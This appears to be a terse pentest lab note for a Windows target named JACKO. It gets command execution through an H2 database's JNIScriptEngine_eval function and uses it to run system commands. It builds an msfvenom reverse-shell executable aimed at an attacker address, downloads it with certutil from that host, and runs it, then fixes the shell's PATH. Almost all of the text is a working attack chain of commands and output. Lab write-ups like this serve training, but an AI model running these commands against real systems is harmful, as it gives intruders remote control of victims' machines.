4 H2 JNIScriptEngine exploit > tony

# run shell
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("cmd.exe /c C:\\Users\\Tony\\Documents\\kashz.exe").getInputStream()).useDelimiter("\\Z").next()');

CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("systeminfo").getInputStream()).useDelimiter("\\Z").next()');

Host Name:                 JACKO
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.18363 N/A Build 18363
Registered Owner:          tony
System Type:               x64-based PC
Hotfix(s):                 9 Hotfix(s) Installed. 

# shell
# use port that is open
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.105 LPORT=8082 -f exe -o kashz.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: kashz.exe

# download shell
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("certutil.exe -urlcache -f http://192.168.49.105/kashz.exe C:\\Users\\Tony\\Documents\\kashz.exe").getInputStream()).useDelimiter("\\Z").next()');


# call shell
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("cmd.exe /c C:\\Users\\Tony\\Documents\\kashz.exe").getInputStream()).useDelimiter("\\Z").next()');

# cant find powershell or anything
echo %path%
C:\Users\tony\AppData\Local\Microsoft\WindowsApps

# update %PATH%
# cmd
set PATH=%PATH%;C:\Windows\System32\;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\wbem\;
# powershell
$env:Path += ";C:\Windows\System32\;C:\Windows\System32\WindowsPowerShell\v1.0\"